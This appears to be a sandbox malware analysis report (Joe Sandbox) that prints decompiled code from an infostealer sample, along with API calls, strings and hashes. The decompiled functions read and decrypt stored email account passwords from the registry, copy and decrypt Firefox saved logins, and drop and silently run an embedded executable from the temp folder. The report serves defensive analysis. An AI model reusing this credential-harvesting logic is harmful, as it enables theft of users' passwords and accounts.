				_t119 = 7;
				_t112 = _t69;
				memset( &_v748, 0, _t119 << 2);
				_t73 = GetMessageA( &_v748, _t112, 0, 0);
				if(_t73 == 0) {
					L9:
					_t144 = _v748.wParam;
					goto L10;
				} else {
					_t144 = _t143 | 0xffffffff;
					while(_t73 != _t144) {
						TranslateMessage( &_v748);
						DispatchMessageA( &_v748);
						_t73 = GetMessageA( &_v748, _t112, 0, 0);
						if(_t73 != 0) {
							continue;
						}
						goto L9;
					}
					L10:
					E01035FEB(_v812);
					return _t144;
				}
			}

0x01038d0f
0x01038d27
0x01038d29
0x01038d2f
0x01038d37
0x01038d3a
0x01038d40
0x01038d46
0x01038d4c
0x01038d4d
0x01038d53
0x01038d54
0x01038d55
0x01038d63
0x01038d68
0x01038d7a
0x01038d7f
0x01038d84
0x01038d90
0x01038d96
0x01038daa
0x01038dac
0x01038db6
0x01038dbc
0x01038dc1
0x01038dc7
0x01038dd7
0x01038ddc
0x01038de1
0x01038df0
0x01038e03
0x01038e10
0x01038e19
0x01038e1f
0x01038e2c
0x01038e31
0x01038e35
0x01038e37
0x01038e3a
0x01038e3a
0x01038e37
0x01038e41
0x01038e54
0x01038e5e
0x01038e67
0x01038e6c
0x01038e71
0x01038e7b
0x01038e86
0x01038ebd
0x01038ec3
0x01038ed0
0x01038ed4
0x01038ee2
0x01038ee7
0x01038eff
0x01038f05
0x01038f0c
0x01038f0f
0x01038f0f
0x01038f19
0x01038f22
0x01038f2a
0x01038f2e
0x01038f46
0x01038f4e
0x01038f4f
0x01038f59
0x01038f67
0x01038f6b
0x01038f9a
0x01038f9a
0x00000000
0x01038f6d
0x01038f6d
0x01038f70
0x01038f79
0x01038f84
0x01038f94
0x01038f98
0x00000000
0x00000000
0x00000000
0x01038f98
0x01038f9e
0x01038fa2
0x01038faf
0x01038faf

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 01038D21
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 01038D90
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 01038DAA
CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 01038DB6
lstrcpyW.KERNEL32 ref: 01038DF0
lstrcatW.KERNEL32(?,010479E8), ref: 01038E03

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01041446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 01041473

GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 01038E86
wsprintfW.USER32 ref: 01038EBD
CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 01038EFF
CloseHandle.KERNEL32(00000000), ref: 01038F0F
RegisterClassW.USER32 ref: 01038F2E
CreateWindowExW.USER32 ref: 01038F46
GetMessageA.USER32 ref: 01038F67
TranslateMessage.USER32(?), ref: 01038F79
DispatchMessageA.USER32 ref: 01038F84
GetMessageA.USER32 ref: 01038F94

Strings

%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 01038EB7
\Microsoft Vision\, xrefs: 01038DA4
ExplorerIdentifier, xrefs: 01038E4B

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Message$Create$FileHandlelstrcatlstrlen$ClassCloseDirectoryDispatchDispatcherExceptionFindFirstFolderLocalModulePathRegisterTimeTranslateUserWindowlstrcpywsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
API String ID: 3509704836-2372768292
Opcode ID: 7a06ef17fe0013c70d0ba8079526ffcc367c03f27a82ac3bd82ceb1a60a54398
Instruction ID: a8da147d08078ab33118fddb53ef8791bb09aaf3b166036d863d450c79740c87
Opcode Fuzzy Hash: 7a06ef17fe0013c70d0ba8079526ffcc367c03f27a82ac3bd82ceb1a60a54398
Instruction Fuzzy Hash: 7F716DB2504304ABC320DBA8DD84EABB7ECFB99700F00495DF6C5D6185EB3AD904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010399FF Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E010399FF(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E010311C0(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E01031052( &_v292, 0, 0x104);
				E01031052( &_v556, 0, 0x104);
				E01031052( &_v820, 0, 0x104);
				E01031052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E01033411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E01033411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E01033411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E01033411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E01033411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E01031052( &_v17204, _t124, 0x1000);
					E01039D97( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E01033411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E01031052( &_v17204, _t130, 0x1000);
					E01039D97( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E01033411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E01031052( &_v17204, _t136, 0x1000);
					E01039D97( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E01033411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E01031052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E01031052( &_v17204, _t142, 0x1000);
					E01039D97( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E01033411( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E01033373( &_v24) > 0) {
					E01031FF2(_t217 - 0x10,  &_v24);
					E01032028(_t180);
				}
				E01031441( &_v24);
				return 1;
			}

0x010399ff
0x010399ff
0x01039a07
0x01039a11
0x01039a1d
0x01039a27
0x01039a2c
0x01039a2e
0x01039a31
0x01039a3f
0x01039a4d
0x01039a5d
0x01039a62
0x01039a68
0x01039a85
0x01039a91
0x01039a91
0x01039aa1
0x01039aab
0x01039ab0
0x01039acc
0x01039ad8
0x01039ad8
0x01039ae3
0x01039aef
0x01039af4
0x01039b10
0x01039b1c
0x01039b1c
0x01039b27
0x01039b33
0x01039b38
0x01039b54
0x01039b60
0x01039b60
0x01039b6b
0x01039b77
0x01039b7c
0x01039b98
0x01039ba4
0x01039ba4
0x01039baf
0x01039bbb
0x01039bc0
0x01039bd8
0x01039bda
0x01039bdc
0x01039beb
0x01039bff
0x01039c04
0x01039c11
0x01039c11
0x01039c1c
0x01039c28
0x01039c2d
0x01039c45
0x01039c47
0x01039c49
0x01039c58
0x01039c6c
0x01039c71
0x01039c7e
0x01039c7e
0x01039c89
0x01039c95
0x01039c9a
0x01039cb2
0x01039cb4
0x01039cb6
0x01039cc5
0x01039cd9
0x01039cde
0x01039ceb
0x01039ceb
0x01039cf6
0x01039d02
0x01039d07
0x01039d1f
0x01039d21
0x01039d23
0x01039d32
0x01039d46
0x01039d4b
0x01039d58
0x01039d58
0x01039d60
0x01039d6e
0x01039d79
0x01039d80
0x01039d80
0x01039d88
0x01039d94

APIs

RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,76B2E710,74758250,00000000,?,010399C3), ref: 01039A81
RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,76B2E710,74758250), ref: 01039AC8
RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 01039B0C
RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 01039B50
RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 01039B94
RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 01039BD8
RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 01039C45
RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 01039CB2
RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 01039D1F

Part of subcall function 01039D97: GlobalAlloc.KERNEL32(00000040,-00000001,76B2E730,?,?,?,01039D4B,00001000,?,00000000,00001000), ref: 01039DB5
Part of subcall function 01039D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,01039D4B), ref: 01039DEB
Part of subcall function 01039D97: lstrcpyW.KERNEL32 ref: 01039E22

Part of subcall function 01033373: lstrlenW.KERNEL32(76B30770,01033758,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 0103337A

Strings

IMAP Password, xrefs: 01039D19
POP3 Server, xrefs: 01039B06
HTTP Password, xrefs: 01039CAC
Account Name, xrefs: 01039A7B
POP3 Password, xrefs: 01039BD2
POP3 User, xrefs: 01039B4A
Email, xrefs: 01039AC2
SMTP Password, xrefs: 01039C3F
SMTP Server, xrefs: 01039B8E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
API String ID: 6593746-2537589853
Opcode ID: b8b8d75c17d732e631e49d7ec77cc889779f50b8a562a753b76ef17572139025
Instruction ID: ef193358dcbc43991c90b6e9650bf353bd3d1d5c7f41e23c894646304beb59b5
Opcode Fuzzy Hash: b8b8d75c17d732e631e49d7ec77cc889779f50b8a562a753b76ef17572139025
Instruction Fuzzy Hash: C3A100B2D1011DBADB25EB94CD45FDEB3BCAF58744F1400A5F645F6080EAB4AB448FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01045169 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119
filestringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E01045169(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t38;
				void* _t40;
				void* _t83;

				_t75 =  *_a4;
				_t68 = __ecx + 4;
				_v8 = __ecx + 4;
				E01033549(_t68, E01043441( *_a4 + 4,  *_t75));
				E01035FEB(_a4);
				_t38 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t40 = LockResource(_t38);
				E01031052( &_v1096, 0, 0x400);
				E01031052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t40, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E01031052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}

0x01045178
0x0104517a
0x01045180
0x01045191
0x01045199
0x010451a4
0x010451b7
0x010451ba
0x010451d0
0x010451de
0x010451f4
0x01045208
0x01045216
0x01045224
0x01045246
0x01045251
0x01045258
0x0104526b
0x01045288
0x01045294
0x0104529b
0x010452a7
0x010452ae
0x010452b1
0x010452b7
0x010452bd
0x010452c2
0x010452c7
0x010452ca
0x010452cd
0x010452d0
0x010452d3
0x010452e0

APIs

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

LoadResource.KERNEL32(00000000,?,00000000), ref: 010451A4
SizeofResource.KERNEL32(00000000,?), ref: 010451B0
LockResource.KERNEL32(00000000), ref: 010451BA
GetTempPathA.KERNEL32(00000400,?), ref: 010451F4
lstrcatA.KERNEL32(?,find.exe), ref: 01045208
GetTempPathA.KERNEL32(00000400,?), ref: 01045216
lstrcatA.KERNEL32(?,find.db), ref: 01045224
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0104523F
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 01045251
CloseHandle.KERNEL32(00000000), ref: 01045258
wsprintfA.USER32 ref: 01045288
ShellExecuteExA.SHELL32(0000003C), ref: 010452D6

Strings

find.db, xrefs: 01045218
@, xrefs: 010452A7
<, xrefs: 01045294
-w %ws -d C -f %s, xrefs: 01045282
find.exe, xrefs: 01045202

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
API String ID: 2504251837-265381321
Opcode ID: 9b35dcdfc765a65db8d064984415992eb2a96029a65083e706d6800f526c2ddb
Instruction ID: e42fa164d704999af2e318a042f7cb00443c7cf7b38ea38acf18e8babec4faad
Opcode Fuzzy Hash: 9b35dcdfc765a65db8d064984415992eb2a96029a65083e706d6800f526c2ddb
Instruction Fuzzy Hash: C8415DB590021DABDB20DFA5DD84EDEBBBCFF89304F004156F649A7110DB745A858FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103A36F Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406
filestringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0103A36F(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E010336F7( &_v24, L"Profile");
				_t281 = 0;
				E01031052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E01031052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E0103B87D(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E010336F7(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0103373F(_t396, _t165);
					_t167 = E0103B165(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E0103357C( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0103373F( &_v36,  &_a4);
						E0103357C( &_v36, _t385, _t400, L"profiles.ini");
						E01033549( &_v24, E010336F7( &_v40, L"Profile"));
						E01035FEB(_v40);
						E01033384( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E01033549( &_v24, E010336F7( &_v96, L"Profile"));
							E01035FEB(_v96);
							_v96 = _t281;
							E01033384( &_v24, _t385, __eflags, _t389);
							E0103373F( &_v12,  &_a4);
							E0103357C( &_v12, _t385, __eflags,  &_v1224);
							E01033666( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0103373F( &_v20,  &_v12);
										E0103357C( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E01040C8A( &_v16, _t386, __eflags);
										E0103357C( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E01033447( &_v16, __eflags, E010335B9( &_v56, _t385, __eflags));
										E01035FEB(_v56);
										_v56 = _t281;
										E0103357C( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E01033549( &_v20,  &_v16);
											_t390 = _v20;
										}
										E010413ED( &_v184, __eflags);
										_t325 =  &_v180;
										E01033549(_t325,  &_v20);
										_push(_t325);
										_t207 = E010416B1( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0104135C( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E010334D1( &_v116, "encryptedUsername");
											_t217 = E0103305D( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E0103961C(_t217, _t215, __eflags);
											_v120 = _t283;
											E01035FEB(_v160);
											_t336 = _v116;
											E01035FEB(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E010334D1( &_v128, "hostname");
													E01039655( &_v88, E0103305D( &_v52,  &_v124), __eflags, _t230, _t394);
													E01035FEB(_v124);
													E01035FEB(_v128);
													_t236 = E010334D1( &_v136, "encryptedUsername");
													E01039655( &_v84, E0103305D( &_v52,  &_v132), __eflags, _t236, _t394);
													E01035FEB(_v132);
													E01035FEB(_v136);
													_t242 = E010334D1( &_v144, "encryptedPassword");
													_t385 = E0103305D( &_v52,  &_v140);
													E01039655( &_v80, _t244, __eflags, _t242, _t394);
													E01035FEB(_v140);
													E01035FEB(_v144);
													E0103A8C3(_t391, __eflags, _v84,  &_v72);
													E0103A8C3(_t391, __eflags, _v80,  &_v76);
													E01033549( &_v112, E010331AF( &_v88, __eflags,  &_v60));
													E01035FEB(_v60);
													_v60 = 0;
													E01033549( &_v108, E010331AF(E010334D1( &_v148, _v72), __eflags,  &_v64));
													E01035FEB(_v64);
													_v64 = 0;
													E01035FEB(_v148);
													E01033549( &_v104, E010331AF(E010334D1( &_v152, _v76), __eflags,  &_v68));
													E01035FEB(_v68);
													_v68 = 0;
													E01035FEB(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E01031FF2(_t396,  &_v112);
													E01032028(_t391);
													E01035FEB(_v72);
													E01035FEB(_v76);
													E01035FEB(_v80);
													E01035FEB(_v84);
													E01035FEB(_v88);
													_t336 =  &_v112;
													E01031441( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0103373F(_t396,  &_v16);
												E0104142A(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E01033148( &_v52);
											_t327 =  &_v184;
										}
										E0104140C(_t327, __eflags);
										E01035FEB(_t393);
										_v16 = _t281;
										E01035FEB(_t390);
										_v20 = _t281;
										E01035FEB(_v28);
										E01035FEB(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E01035FEB(_v28);
								E01035FEB(_v12);
							}
							_v12 = _t281;
						}
						E0103B10E(_t392);
						_t281 = 1;
						E01035FEB(_v36);
					}
					E01035FEB(_v44);
				}
				E01035FEB(_v24);
				E01035FEB(_a4);
				return _t281;
			}

0x0103a36f
0x0103a37b
0x0103a385
0x0103a388
0x0103a392
0x0103a39c
0x0103a3a1
0x0103a3a4
0x0103a3ad
0x0103a3b6
0x0103a3bd
0x0103a3d0
0x0103a3dd
0x0103a3e0
0x0103a3f1
0x0103a402
0x0103a408
0x0103a40c
0x0103a40f
0x0103a47d
0x0103a411
0x0103a411
0x0103a411
0x0103a413
0x0103a417
0x0103a41e
0x0103a423
0x0103a425
0x0103a433
0x0103a43f
0x0103a44c
0x0103a462
0x0103a46a
0x0103a473
0x0103a86a
0x0103a480
0x0103a489
0x0103a495
0x0103a49d
0x0103a4a6
0x0103a4a9
0x0103a4b5
0x0103a4c4
0x0103a4d0
0x0103a4d8
0x0103a4dc
0x0103a4de
0x0103a4f5
0x0103a4fb
0x0103a501
0x0103a503
0x00000000
0x0103a505
0x0103a509
0x0103a50c
0x0103a50f
0x0103a511
0x00000000
0x0103a513
0x0103a51a
0x0103a527
0x0103a52e
0x0103a532
0x0103a53f
0x0103a546
0x0103a553
0x0103a55b
0x0103a568
0x0103a56b
0x0103a570
0x0103a573
0x0103a57f
0x0103a581
0x0103a58a
0x0103a58f
0x0103a58f
0x0103a598
0x0103a5a1
0x0103a5a7
0x0103a5ac
0x0103a5b8
0x0103a5bd
0x0103a5c3
0x0103a5c5
0x0103a5d5
0x0103a5d9
0x0103a5dc
0x0103a5e9
0x0103a5fa
0x0103a5ff
0x0103a60e
0x0103a610
0x0103a613
0x0103a618
0x0103a61b
0x0103a620
0x0103a622
0x0103a7f5
0x0103a7f5
0x0103a628
0x0103a628
0x0103a62b
0x0103a62b
0x0103a62d
0x0103a630
0x0103a639
0x0103a63c
0x0103a63f
0x0103a642
0x0103a659
0x0103a663
0x0103a66b
0x0103a67c
0x0103a693
0x0103a69d
0x0103a6a8
0x0103a6b9
0x0103a6ce
0x0103a6d3
0x0103a6e0
0x0103a6eb
0x0103a6f9
0x0103a707
0x0103a71c
0x0103a724
0x0103a72c
0x0103a749
0x0103a751
0x0103a75c
0x0103a75f
0x0103a781
0x0103a789
0x0103a794
0x0103a797
0x0103a79c
0x0103a79f
0x0103a7a8
0x0103a7af
0x0103a7b7
0x0103a7bf
0x0103a7c7
0x0103a7cf
0x0103a7d7
0x0103a7dc
0x0103a7df
0x0103a7e4
0x0103a7e4
0x0103a7e4
0x0103a7ed
0x0103a7f0
0x0103a7f0
0x0103a7f8
0x0103a7fe
0x0103a800
0x0103a809
0x0103a80e
0x0103a813
0x0103a81d
0x0103a827
0x0103a82d
0x0103a832
0x0103a832
0x0103a838
0x0103a83f
0x0103a846
0x0103a849
0x0103a851
0x0103a854
0x0103a85c
0x0103a861
0x0103a864
0x0103a864
0x0103a511
0x0103a4e0
0x0103a4e0
0x0103a4e3
0x0103a4eb
0x0103a4eb
0x0103a867
0x0103a867
0x0103a892
0x0103a89c
0x0103a89d
0x0103a89d
0x0103a8a5
0x0103a8a5
0x0103a8ad
0x0103a8b5
0x0103a8c0

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 0103B87D: lstrcpyW.KERNEL32 ref: 0103B8B9
Part of subcall function 0103B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0103B8C7
Part of subcall function 0103B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,01039E8E,?,00000104,00000000), ref: 0103B8E0
Part of subcall function 0103B87D: RegQueryValueExW.ADVAPI32(01039E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0103B8FD
